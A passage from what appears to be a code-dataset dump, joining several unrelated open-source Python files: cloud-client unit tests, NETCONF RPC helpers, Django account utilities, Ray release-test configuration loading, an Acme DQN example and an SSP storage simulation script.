        symboldict_containing_forbidden_key.strict = True
@then('symboldict is strict')
def symboldict_is_strict(new_how_symboldict):
    """symboldict is strict."""
    assert new_how_symboldict.strict
@then('updating symboldict from sequence raises TypeError')
def updating_symboldict_from_sequence_raises_typeerror(
        strict_symboldict, sequence_of_items_containing_forbidden_key):
    """updating symboldict from sequence raises TypeError."""
    with pytest.raises(TypeError):
        strict_symboldict.update(sequence_of_items_containing_forbidden_key)
# Restores the step-text and function name corrupted by the dump artifact
# (' | ' split). The @then string must match the feature file wording.
@then('updating symboldict with dict raises TypeError')
def updating_symboldict_with_dict_raises_typeerror(
        strict_symboldict, dict_containing_forbidden_key):
    """updating symboldict with dict raises TypeError."""
    with pytest.raises(TypeError):
        strict_symboldict.update(dict_containing_forbidden_key)
|
googleapis/python-compute | tests/unit/gapic/compute_v1/test_global_public_delegated_prefixes.py | Python | apache-2.0 | 96,661 | 0.001335 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
from collections.abc import Iterable
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.global_public_delegated_prefixes import (
GlobalPublicDelegatedPrefixesClient,
)
from google.cloud.compute_v1.services.global_public_delegated_prefixes import pagers
from google.cloud.compute_v1.services.global_public_delegated_prefixes import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
    """Dummy mTLS client-certificate source used by the tests below."""
    cert, key = b"cert bytes", b"key bytes"
    return cert, key
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
    """Return a stand-in endpoint when the client's default is localhost.

    This lets the tests force a different mTLS endpoint for endpoint-testing
    purposes, as described in the comment above.
    """
    endpoint = client.DEFAULT_ENDPOINT
    if "localhost" in endpoint:
        return "foo.googleapis.com"
    return endpoint
def test__get_default_mtls_endpoint():
    """_get_default_mtls_endpoint maps *.googleapis.com hosts to their mtls
    variant, passes None through, and leaves non-Google hosts untouched.

    (Restores two lines corrupted by ' | ' dump artifacts.)
    """
    api_endpoint = "example.googleapis.com"
    api_mtls_endpoint = "example.mtls.googleapis.com"
    sandbox_endpoint = "example.sandbox.googleapis.com"
    sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
    non_googleapi = "api.example.com"
    assert GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(None) is None
    assert (
        GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(api_endpoint)
        == api_mtls_endpoint
    )
    assert (
        GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(
            api_mtls_endpoint
        )
        == api_mtls_endpoint
    )
    assert (
        GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(sandbox_endpoint)
        == sandbox_mtls_endpoint
    )
    assert (
        GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(
            sandbox_mtls_endpoint
        )
        == sandbox_mtls_endpoint
    )
    assert (
        GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(non_googleapi)
        == non_googleapi
    )
@pytest.mark.parametrize(
    "client_class,transport_name", [(GlobalPublicDelegatedPrefixesClient, "rest"),]
)
def test_global_public_delegated_prefixes_client_from_service_account_info(
    client_class, transport_name
):
    """from_service_account_info builds a client with the mocked credentials."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_info"
    ) as factory:
        factory.return_value = creds
        info = {"valid": True}
        client = client_class.from_service_account_info(info, transport=transport_name)
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        # REST transports use an https URL; gRPC transports append :443.
        assert client.transport._host == (
            "compute.googleapis.com{}".format(":443")
            if transport_name in ["grpc", "grpc_asyncio"]
            else "https://{}".format("compute.googleapis.com")
        )
@pytest.mark.parametrize(
    "transport_class,transport_name",
    [(transports.GlobalPublicDelegatedPrefixesRestTransport, "rest"),],
)
def test_global_public_delegated_prefixes_client_service_account_always_use_jwt(
    transport_class, transport_name
):
    """with_always_use_jwt_access is invoked iff always_use_jwt_access=True."""
    with mock.patch.object(
        service_account.Credentials, "with_always_use_jwt_access", create=True
    ) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=True)
        use_jwt.assert_called_once_with(True)
    with mock.patch.object(
        service_account.Credentials, "with_always_use_jwt_access", create=True
    ) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=False)
        use_jwt.assert_not_called()
@pytest.mark.parametrize(
    "client_class,transport_name", [(GlobalPublicDelegatedPrefixesClient, "rest"),]
)
def test_global_public_delegated_prefixes_client_from_service_account_file(
    client_class, transport_name
):
    """Both from_service_account_file and _json produce a working client."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_file"
    ) as factory:
        factory.return_value = creds
        client = client_class.from_service_account_file(
            "dummy/file/path.json", transport=transport_name
        )
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        # from_service_account_json is an alias for the same factory.
        client = client_class.from_service_account_json(
            "dummy/file/path.json", transport=transport_name
        )
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        assert client.transport._host == (
            "compute.googleapis.com{}".format(":443")
            if transport_name in ["grpc", "grpc_asyncio"]
            else "https://{}".format("compute.googleapis.com")
        )
def test_global_public_delegated_prefixes_client_get_transport_class():
    """get_transport_class resolves both the default and the named transport."""
    transport = GlobalPublicDelegatedPrefixesClient.get_transport_class()
    available_transports = [
        transports.GlobalPublicDelegatedPrefixesRestTransport,
    ]
    assert transport in available_transports
    transport = GlobalPublicDelegatedPrefixesClient.get_transport_class("rest")
    assert transport == transports.GlobalPublicDelegatedPrefixesRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
GlobalPublicDelegatedPrefixesClient,
transports.GlobalPublicDelegatedPrefixesRestTransport,
"rest",
),
],
)
@mock.patch.object(
GlobalPublicDelegatedPrefixesClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(GlobalPublicDelegatedPrefixesClient),
)
def test_global_public_delegated_prefixes_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(
GlobalPublicDelegatedPrefixesClient, "get_transport_class"
) as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(
GlobalPublicDelegatedPrefixesClient, "get_transport_class"
) as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
h |
GIC-de/ncclient | ncclient/operations/third_party/hpcomware/rpc.py | Python | apache-2.0 | 1,760 | 0 | from lxml import etree
from ncclient.xml_ import *
from ncclient.operations.rpc import RPC
class DisplayCommand(RPC):
    """Run HP Comware display (read-only) CLI commands over NETCONF."""

    def request(self, cmds):
        """
        Single Execution element is permitted.
        cmds can be a list or single command
        """
        # (Restores the docstring terminator and the Execution continuation
        # line corrupted by ' | ' dump artifacts.)
        if isinstance(cmds, list):
            cmd = '\n'.join(cmds)
        # NOTE(review): `unicode` is Python 2 only — this branch raises
        # NameError on Python 3; confirm the supported interpreter version.
        elif isinstance(cmds, str) or isinstance(cmds, unicode):
            cmd = cmds
        node = etree.Element(qualify('CLI', BASE_NS_1_0))
        etree.SubElement(node, qualify('Execution',
                                       BASE_NS_1_0)).text = cmd
        return self._request(node)
class ConfigCommand(RPC):
    """Push HP Comware configuration CLI commands over NETCONF."""

    def request(self, cmds):
        """
        Single Configuration element is permitted.
        cmds can be a list or single command
        commands are pushed to the switch in this method
        """
        if isinstance(cmds, list):
            command_text = '\n'.join(cmds)
        elif isinstance(cmds, str) or isinstance(cmds, unicode):
            command_text = cmds
        cli_node = etree.Element(qualify('CLI', BASE_NS_1_0))
        config_node = etree.SubElement(cli_node,
                                       qualify('Configuration', BASE_NS_1_0))
        config_node.text = command_text
        return self._request(cli_node)
class Action(RPC):
    # Wrap caller-supplied XML in an <action> element after validating it.
    def request(self, action=None):
        node = new_ele("action")
        node.append(validated_element(action))
        return self._request(node)
class Save(RPC):
    # Build a <save><file>filename</file></save> RPC and submit it.
    def request(self, filename=None):
        node = new_ele('save')
        sub_ele(node, 'file').text = filename
        return self._request(node)
class Rollback(RPC):
    # Build a <rollback><file>filename</file></rollback> RPC and submit it.
    def request(self, filename=None):
        node = new_ele('rollback')
        sub_ele(node, 'file').text = filename
        return self._request(node)
|
tamasgal/django-tornado | demosite/demosite/urls.py | Python | mit | 164 | 0.006098 | f | rom django.conf.urls import patterns, include, url
from django.contrib import admin
# Route URLs beginning with "hello-django" to the demo view.
# (Restores the `urlpatterns` identifier corrupted by a ' | ' dump artifact.)
urlpatterns = patterns('',
    (r'^hello-django', 'demosite.views.hello'),
)
|
bl4ckdu5t/registron | tests/libraries/test_xml.py | Python | mit | 432 | 0.00463 | #- | ----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#---------------------------------------------------------------------- | -------
# xml hook test
import xml
|
nlhkabu/connect | connect/accounts/utils.py | Python | bsd-3-clause | 2,295 | 0 | from django import forms
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from connect.utils import send_connect_email, generate_unique_id
def create_inactive_user(email, full_name):
    """
    Create inactive user with basic details.

    Used when moderators invite new users and when a member of the public
    requests an account.
    """
    User = get_user_model()
    user = User.objects.create_user(email)
    user.is_active = False
    user.full_name = full_name
    # No password yet: the user chooses one during account activation.
    user.set_unusable_password()
    return user
def invite_user_to_reactivate_account(user, request):
    """
    Send an email to a user asking them if they'd like to reactivate
    their account.

    Resets the user's auth token, emails a reactivation link built from the
    current site, and returns the (saved) user.
    (Restores the function name corrupted by a ' | ' dump artifact.)
    """
    # Build and send a reactivation link for closed account
    user.auth_token = generate_unique_id()  # Reset token
    user.auth_token_is_used = False
    user.save()
    site = get_current_site(request)
    url = request.build_absolute_uri(
        reverse('accounts:activate-account',
                args=[user.auth_token]))
    # Send email
    subject = _('Reactivate your {} account'.format(site.name))
    template = 'accounts/emails/reactivate_account.html'
    send_connect_email(subject=subject,
                       template=template,
                       recipient=user,
                       site=site,
                       url=url)
    return user
def get_user(email):
    """
    Return the user registered with the supplied email address, or None
    when no user has registered it.
    """
    User = get_user_model()
    try:
        return User.objects.get(email=email)
    except User.DoesNotExist:
        return None
def validate_email_availability(email):
    """
    Raise forms.ValidationError when *email* is already registered to an
    existing user; return True when it is available.
    """
    if get_user(email):
        raise forms.ValidationError(
            ugettext_lazy('Sorry, this email address is already '
                          'registered to another user.'),
            code='email_already_registered'
        )
    return True
|
ray-project/ray | release/ray_release/config.py | Python | apache-2.0 | 6,617 | 0.000907 | import copy
import datetime
import json
import os
from typing import Dict, List, Optional
import jinja2
import jsonschema
import yaml
from ray_release.anyscale_util import find_cloud_by_name
from ray_release.exception import ReleaseTestConfigError
from ray_release.logger import logger
from ray_release.util import deep_update
class Test(dict):
    """A single release-test definition (one parsed yaml entry), kept as a plain dict."""
    pass
DEFAULT_WHEEL_WAIT_TIMEOUT = 7200  # Two hours
DEFAULT_COMMAND_TIMEOUT = 1800  # seconds
DEFAULT_BUILD_TIMEOUT = 1800  # seconds
DEFAULT_CLUSTER_TIMEOUT = 1800  # seconds
DEFAULT_CLOUD_ID = "cld_4F7k8814aZzGG8TNUGPKnc"
# Values substituted into yaml templates; EXPIRATION_* are absolute dates
# N days from now, used e.g. for resource expiry tags.
DEFAULT_ENV = {
    "DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
    "TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
    "EXPIRATION_1D": str(
        (datetime.datetime.now() + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
    ),
    "EXPIRATION_2D": str(
        (datetime.datetime.now() + datetime.timedelta(days=2)).strftime("%Y-%m-%d")
    ),
    "EXPIRATION_3D": str(
        (datetime.datetime.now() + datetime.timedelta(days=3)).strftime("%Y-%m-%d")
    ),
}
# Paths resolved relative to this package's parent (the release/ directory).
RELEASE_PACKAGE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
RELEASE_TEST_SCHEMA_FILE = os.path.join(
    RELEASE_PACKAGE_DIR, "ray_release", "schema.json"
)
class TestEnvironment(dict):
    """Process-wide key/value environment handed to yaml template rendering."""
    pass
_test_env = None
def get_test_environment():
    """Return the shared TestEnvironment, creating it from DEFAULT_ENV on first use."""
    global _test_env
    if _test_env:
        return _test_env
    _test_env = TestEnvironment(**DEFAULT_ENV)
    return _test_env
def set_test_env_var(key: str, value: str):
    """Set *key* to *value* in the shared test environment."""
    get_test_environment()[key] = value
def get_test_env_var(key: str, default: Optional[str] = None):
    """Look up *key* in the shared test environment, falling back to *default*."""
    return get_test_environment().get(key, default)
def read_and_validate_release_test_collection(config_file: str) -> List[Test]:
    """Read and validate test collection from config file.

    Raises ReleaseTestConfigError (via validate_release_test_collection)
    when any entry fails schema validation.
    """
    with open(config_file, "rt") as fp:
        test_config = yaml.safe_load(fp)
    validate_release_test_collection(test_config)
    return test_config
def load_schema_file(path: Optional[str] = None) -> Dict:
    """Load a JSON schema, defaulting to the bundled release-test schema file."""
    schema_path = path or RELEASE_TEST_SCHEMA_FILE
    with open(schema_path, "rt") as schema_file:
        return json.load(schema_file)
def validate_release_test_collection(test_collection: List[Test]):
    """Validate every test against the release-test schema.

    Logs each individual failure, then raises ReleaseTestConfigError with the
    total error count so callers see all problems at once rather than the
    first one.
    """
    try:
        schema = load_schema_file()
    except Exception as e:
        raise ReleaseTestConfigError(
            f"Could not load release test validation schema: {e}"
        ) from e
    num_errors = 0
    for test in test_collection:
        error = validate_test(test, schema)
        if error:
            logger.error(
                f"Failed to validate test {test.get('name', '(unnamed)')}: {error}"
            )
            num_errors += 1
    if num_errors > 0:
        raise ReleaseTestConfigError(
            f"Release test configuration error: Found {num_errors} test "
            f"validation errors."
        )
def validate_test(test: Test, schema: Optional[Dict] = None) -> Optional[str]:
    """Validate a single test against *schema* (loaded from disk when None).

    Returns an error message string on failure, or None (implicitly) when the
    test is valid.
    """
    schema = schema or load_schema_file()
    try:
        jsonschema.validate(test, schema=schema)
    except (jsonschema.ValidationError, jsonschema.SchemaError) as e:
        return str(e.message)
    except Exception as e:
        # Catch-all so a malformed entry reports an error instead of crashing
        # the whole collection validation.
        return str(e)
def find_test(test_collection: List[Test], test_name: str) -> Optional[Test]:
    """Return the test named *test_name* from *test_collection*, or None if absent."""
    return next(
        (candidate for candidate in test_collection
         if candidate["name"] == test_name),
        None,
    )
def as_smoke_test(test: Test) -> Test:
    """Return the smoke-test variant of *test* by merging its smoke_test config.

    NOTE: mutates the input — ``smoke_test`` is popped from *test* before the
    deep merge. Tests without a smoke_test section are returned unchanged
    (with a warning).
    """
    if "smoke_test" not in test:
        logger.warning(
            f"Requested smoke test, but test with name {test['name']} does "
            f"not have any smoke test configuration."
        )
        return test
    smoke_test_config = test.pop("smoke_test")
    new_test = deep_update(test, smoke_test_config)
    return new_test
def get_wheels_sanity_check(commit: Optional[str] = None):
    """Build a shell command verifying the installed Ray wheel's commit.

    With *commit*, the command asserts ``ray.__commit__`` matches it;
    without, it merely prints the installed commit.
    """
    if commit:
        return (
            f"python -c 'import ray; "
            f'assert ray.__commit__ == "{commit}", ray.__commit__\''
        )
    return (
        "python -c 'import ray; print("
        '"No commit sanity check available, but this is the '
        "Ray wheel commit:\", ray.__commit__)'"
    )
def load_and_render_yaml_template(
    template_path: str, env: Optional[Dict] = None
) -> Optional[Dict]:
    """Render the Jinja2 template at *template_path* and parse the result as YAML.

    Returns None for an empty path. Raises ReleaseTestConfigError when the
    file is missing or rendering/parsing fails.
    """
    if not template_path:
        return None
    if not os.path.exists(template_path):
        raise ReleaseTestConfigError(
            f"Cannot load yaml template from {template_path}: Path not found."
        )
    with open(template_path, "rt") as f:
        content = f.read()
    # Removed the dead `render_env = copy.deepcopy(os.environ)` block: it was
    # built and updated but never passed to render(), which only exposes
    # `env` to the template.
    try:
        content = jinja2.Template(content).render(env=env)
        return yaml.safe_load(content)
    except Exception as e:
        raise ReleaseTestConfigError(
            f"Error rendering/loading yaml template: {e}"
        ) from e
def load_test_cluster_env(test: Test, ray_wheels_url: str) -> Optional[Dict]:
    """Render and parse the cluster-environment yaml referenced by *test*."""
    cluster_env_file = test["cluster"]["cluster_env"]
    cluster_env_path = os.path.join(
        RELEASE_PACKAGE_DIR, test.get("working_dir", ""), cluster_env_file
    )
    env = get_test_environment()
    commit = env.get("RAY_COMMIT", None)
    # Bake the wheel URL and a commit sanity-check command into the template env.
    env["RAY_WHEELS_SANITY_CHECK"] = get_wheels_sanity_check(commit)
    env["RAY_WHEELS"] = ray_wheels_url
    return load_and_render_yaml_template(cluster_env_path, env=env)
def load_test_cluster_compute(test: Test) -> Optional[Dict]:
    """Render and parse the cluster-compute yaml referenced by *test*."""
    cluster_compute_file = test["cluster"]["cluster_compute"]
    cluster_compute_path = os.path.join(
        RELEASE_PACKAGE_DIR, test.get("working_dir", ""), cluster_compute_file
    )
    env = get_test_environment()
    # Templates reference the resolved Anyscale cloud via ANYSCALE_CLOUD_ID.
    cloud_id = get_test_cloud_id(test)
    env["ANYSCALE_CLOUD_ID"] = cloud_id
    return load_and_render_yaml_template(cluster_compute_path, env=env)
def get_test_cloud_id(test: Test) -> str:
    """Resolve the Anyscale cloud id for a test's cluster configuration.

    Exactly one of ``cloud_id``/``cloud_name`` may be supplied; a name is
    looked up via ``find_cloud_by_name``, and when neither is given the
    module default cloud id is used.
    """
    cluster_cfg = test["cluster"]
    cloud_id = cluster_cfg.get("cloud_id", None)
    cloud_name = cluster_cfg.get("cloud_name", None)
    if cloud_id and cloud_name:
        raise RuntimeError(
            f"You can't supply both a `cloud_name` ({cloud_name}) and a "
            f"`cloud_id` ({cloud_id}) in the test cluster configuration. "
            f"Please provide only one."
        )
    if cloud_name and not cloud_id:
        # Translate the human-readable name into an id.
        cloud_id = find_cloud_by_name(cloud_name)
        if not cloud_id:
            raise RuntimeError(f"Couldn't find cloud with name `{cloud_name}`.")
        return cloud_id
    # Either an explicit id was given, or fall back to the default cloud.
    return cloud_id or DEFAULT_CLOUD_ID
|
deepmind/acme | examples/open_spiel/run_dqn.py | Python | apache-2.0 | 2,566 | 0.007015 | # python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gove | rning permissions and
# limitations under the License.
"""Example running DQN on OpenSpiel game in a single process."""
from absl import app
from absl import flags
import acme
from acme import wrappers
from acme.agents.tf import dqn
from acme.environment_loops import open_spiel_environment_loop
from | acme.tf.networks import legal_actions
from acme.wrappers import open_spiel_wrapper
import sonnet as snt
from open_spiel.python import rl_environment
# Command-line flags: which OpenSpiel game to run and (optionally) how
# many players it should be configured with.
flags.DEFINE_string('game', 'tic_tac_toe', 'Name of the game')
flags.DEFINE_integer('num_players', None, 'Number of players')
FLAGS = flags.FLAGS
def main(_):
  """Build one DQN agent per player and run the OpenSpiel training loop."""
  # Construct the environment (single precision) and grab its spec.
  game_settings = {'players': FLAGS.num_players} if FLAGS.num_players else {}
  environment = open_spiel_wrapper.OpenSpielWrapper(
      rl_environment.Environment(FLAGS.game, **game_settings))
  environment = wrappers.SinglePrecisionWrapper(environment)  # type: open_spiel_wrapper.OpenSpielWrapper  # pytype: disable=annotation-type-mismatch
  environment_spec = acme.make_environment_spec(environment)
  # One masked Q-network plus epsilon-greedy policy head per player.
  networks = []
  policy_networks = []
  for _player in range(environment.num_players):
    q_network = legal_actions.MaskedSequential([
        snt.Flatten(),
        snt.nets.MLP([50, 50, environment_spec.actions.num_values])
    ])
    behavior_policy = snt.Sequential(
        [q_network,
         legal_actions.EpsilonGreedy(epsilon=0.1, threshold=-1e8)])
    networks.append(q_network)
    policy_networks.append(behavior_policy)
  # One independent DQN agent per player, sharing nothing.
  agents = []
  for q_network, behavior_policy in zip(networks, policy_networks):
    agents.append(
        dqn.DQN(environment_spec=environment_spec,
                network=q_network,
                policy_network=behavior_policy))
  # Drive all agents through the multi-agent OpenSpiel loop.
  loop = open_spiel_environment_loop.OpenSpielEnvironmentLoop(
      environment, agents)
  loop.run(num_episodes=100000)
if __name__ == '__main__':
app.run(main)
|
ocpnetworking-wip/oom | oom/oomtypes.py | Python | mit | 811 | 0.001233 | # ////////////////////////////////////// | ///////////////////////////////
#
# oomtypes.py : Common type definitions used by multiple OOM mod | ules
#
# Copyright 2015 Finisar Inc.
#
# Author: Don Bollinger don@thebollingers.org
#
# ////////////////////////////////////////////////////////////////////
import struct
from ctypes import *
#
# This class recreates the port structure in the southbound API
#
class c_port_t(Structure):
    """ctypes mirror of the southbound API's port structure.

    Field order and sizes must match the C definition exactly:
    an opaque handle pointer, the port class code (see ``port_class_e``),
    and a fixed 32-byte name buffer.
    """
    _fields_ = [("handle", c_void_p),
                ("oom_class", c_int),
                ("name", c_ubyte * 32)]
# Southbound API will report the 'class' of a module, basically
# whether it uses i2c addresses, pages, and bytes (SFF) or
# it uses mdio, a flat 16 bit address space, and words (CFP)
# (values must stay in sync with the southbound C definitions)
port_class_e = {
    'UNKNOWN': 0x00,
    'SFF': 0x01,
    'CFP': 0x02
    }
|
windskyer/k_cinder | paxes_cinder/k2aclient/k2asample/tool_ssp_simulation.py | Python | apache-2.0 | 36,321 | 0.000854 | #
# =================================================================
# =================================================================
# def _enum(**enums):
# return type('Enum', (), enums)
import eventlet
from eventlet import greenthread
import paxes_cinder.k2aclient.k2asample as k2asample
from paxes_cinder.k2aclient.v1 import k2uom
from paxes_cinder.k2aclient.k2asample import dump_k2resp
from paxes_cinder.k2aclient import client
from paxes_cinder.k2aclient.openstack.common import lockutils
from paxes_cinder.k2aclient import exceptions as k2exceptions
from paxes_cinder.k2aclient.k2asample.k2_ssp_cluster_vios_snap \
import cluster_vios_snap
from itertools import repeat
from collections import deque
import time
import pickle
import logging
from os.path import expanduser
from random import randrange
import json
import random
import datetime
import paxes_cinder.k2aclient.v1.cluster_manager as cluster_manager
# import numpy as np
# MOCK: when True, no K2 calls are made and timestamps are synthesized.
MOCK = False
# VIOS_DUMP_ACTIVATED: gate for capturing VIOS diagnostic snaps on errors.
VIOS_DUMP_ACTIVATED = False
# Lock decorator namespace shared by this simulation's critical sections.
synchronized = lockutils.synchronized_with_prefix('k2a-')
class MockLu(object):
    """Minimal stand-in for a k2 logical unit, used when MOCK mode is on.

    Each instance receives a unique, monotonically increasing
    ``unique_device_id`` drawn from the class-level counter.
    """
    # class-level counter handing out unique device ids
    ugenid = 0
    def __init__(self):
        self.unique_device_id = MockLu.ugenid
        MockLu.ugenid += 1
def _timer(prev_time):
"""Simple timer"""
return time.time() - prev_time
def _chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i + n]
# Timestamp of the most recent VIOS dump; used to rate-limit dumping.
_last_dump = None
# Serialized so concurrent greenthreads can't trigger overlapping dumps.
@synchronized('simulation')
def _process_k2_exception(simulation, e):
    """React to a K2 exception, optionally capturing a VIOS diagnostic dump.

    Dumps are taken only when VIOS_DUMP_ACTIVATED is set, only for
    exception types carrying a ``diagfspec``, and at most once per
    ``time_between_dumps`` seconds.
    """
    if not VIOS_DUMP_ACTIVATED:
        msg = ("Exception:"
               " msg: >%s<,"
               " VIOS dump is not activated,"
               " continuing ...")
        print (msg % (e,))
        return
    time_between_dumps = 300
    global _last_dump
    if _last_dump is not None:
        delta = time.time() - _last_dump
        if delta < time_between_dumps:
            msg = ("exception: >%s<,"
                   " recent dump,"
                   " take a break ...")
            # NOTE(review): this prints the tuple; presumably meant
            # ``msg % (e,)`` like the other branches -- confirm.
            print (msg, (e,))
            greenthread.sleep(100)
            return
    # Only CRUD failures, K2 errors and job failures carry a diagnostic
    # file spec worth dumping.
    dump = False
    diagfspec = None
    if isinstance(e, k2exceptions.K2aCrudException):
        dump = True
        diagfspec = e.diagfspec
    elif isinstance(e, k2exceptions.K2aK2Error):
        dump = True
        diagfspec = e.diagfspec
    elif isinstance(e, k2exceptions.K2JobFailure):
        dump = True
        diagfspec = e.diagfspec
    if dump and diagfspec is not None:
        msg = ("exception: >%s<, "
               " take a dump corresponding "
               " to e.diagfspec: >%s<, "
               " and then take a break ...")
        print (msg % (e, diagfspec,))
        if simulation.vios_password is not None:
            # Capture a cluster-wide VIOS snap alongside the k2 diagnostics.
            cluster_vios_snap(simulation.image_pool.vios_ips,
                              diagfspec + ".vios",
                              password=simulation.vios_password)
        greenthread.sleep(100)
        _last_dump = time.time()
    else:
        msg = ("exception: >%s<,"
               " but no dump ...")
        print (msg % (e,))
def _enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
enums['reverse_mapping'] = reverse
return type('Enum', (), enums)
# def _enum(*sequential):
#     enums = dict(zip(sequential,sequential))
#     return type('Enum', (), enums)
# The operations the simulation can perform against the SSP cluster.
OperationType = _enum("DEPLOY_FROM_IMAGE",
                      "DEPLOY_FROM_SNAPSHOT",
                      "SNAPSHOT_A_DEPLOY",
                      "DELETE_A_SNAPSHOT",
                      "DELETE_A_DEPLOY")
# Trend direction for the deploy population.
DeployState = _enum("INCREASING",
                    "DECREASING")
# Trend direction for the snapshot population.
SnapshotState = _enum("INCREASING",
                      "DECREASING")
def _record(simulation, operation, e, duration):
    """Append one operation outcome to the simulation history.

    Records a (type, error-string, duration, timestamp) tuple and updates
    the running deploy/snapshot counters that mirror the operation stream.
    """
    estr = None
    if e is not None:
        estr = str(e)
    if MOCK:
        # MOCK mode inflates timestamps, presumably to spread simulated
        # runs out on the time axis -- TODO confirm intent.
        t = time.time() * 10000.0
    else:
        t = time.time()
    simulation.operations.append((operation.type, estr, duration, t))
    # track number of snapshots and number of deploys
    if len(simulation.deploys_at_oper) == 0:
        prev_deploys = 0
    else:
        prev_deploys = simulation.deploys_at_oper[-1]
    if len(simulation.snapshots_at_oper) == 0:
        prev_snapshots = 0
    else:
        prev_snapshots = simulation.snapshots_at_oper[-1]
    # Each operation type moves exactly one of the two counters by one.
    if operation.type == OperationType.DEPLOY_FROM_IMAGE:
        simulation.deploys_at_oper.append(prev_deploys + 1)
        simulation.snapshots_at_oper.append(prev_snapshots)
    elif operation.type == OperationType.DEPLOY_FROM_SNAPSHOT:
        simulation.deploys_at_oper.append(prev_deploys + 1)
        simulation.snapshots_at_oper.append(prev_snapshots)
    elif operation.type == OperationType.SNAPSHOT_A_DEPLOY:
        simulation.deploys_at_oper.append(prev_deploys)
        simulation.snapshots_at_oper.append(prev_snapshots + 1)
    elif operation.type == OperationType.DELETE_A_SNAPSHOT:
        simulation.deploys_at_oper.append(prev_deploys)
        simulation.snapshots_at_oper.append(prev_snapshots - 1)
    elif operation.type == OperationType.DELETE_A_DEPLOY:
        simulation.deploys_at_oper.append(prev_deploys - 1)
        simulation.snapshots_at_oper.append(prev_snapshots)
def _parse_vios(node_vios):
node_parts = node_vios.split('/')
ms_id = node_part | s[-3]
vios_id = node_parts[-1]
return ms_id, vios_id
class ImagePool(object):
def __init__(self, cs, cluster_id, existing=None, fake=None):
if MOCK:
self._cs = cs
self._cluster = None
self._ssp_id = None
self._ssp = None
self._fake = True # MOCK is always fake
self._next = 0
if fake is not None:
prefix, num_images, image | _size, thin, lut = fake
self._images = num_images * [None]
else:
self._images = len(existing) * [None]
return
self._cs = cs
self._cluster = self._cs.cluster.get(cluster_id)
self._ssp_id = self._cluster.sharedstoragepool_id()
self._ssp = self._cs.sharedstoragepool.get(self._ssp_id)
self._images = []
self._next = 0
# vios
self._vios_ips = []
for node in self._cluster.node.node:
if not node.virtual_io_server:
print(_("Node: >%s<,"
" has no virtual_io_server,"
" continuing ...") % node.partition_name)
ms_id, vios_id = _parse_vios(node.virtual_io_server)
try:
vios = cs.\
virtualioserver.get(ms_id,
vios_id,
xag=["None"])
except Exception as e:
msg = _("Failed to retrieve"
" node: >%s<,"
" msg: >%s<,"
" continuing ...")
raise Exception(msg % (node.partition_name, e))
self._vios_ips.append(vios.resource_monitoring_ip_address)
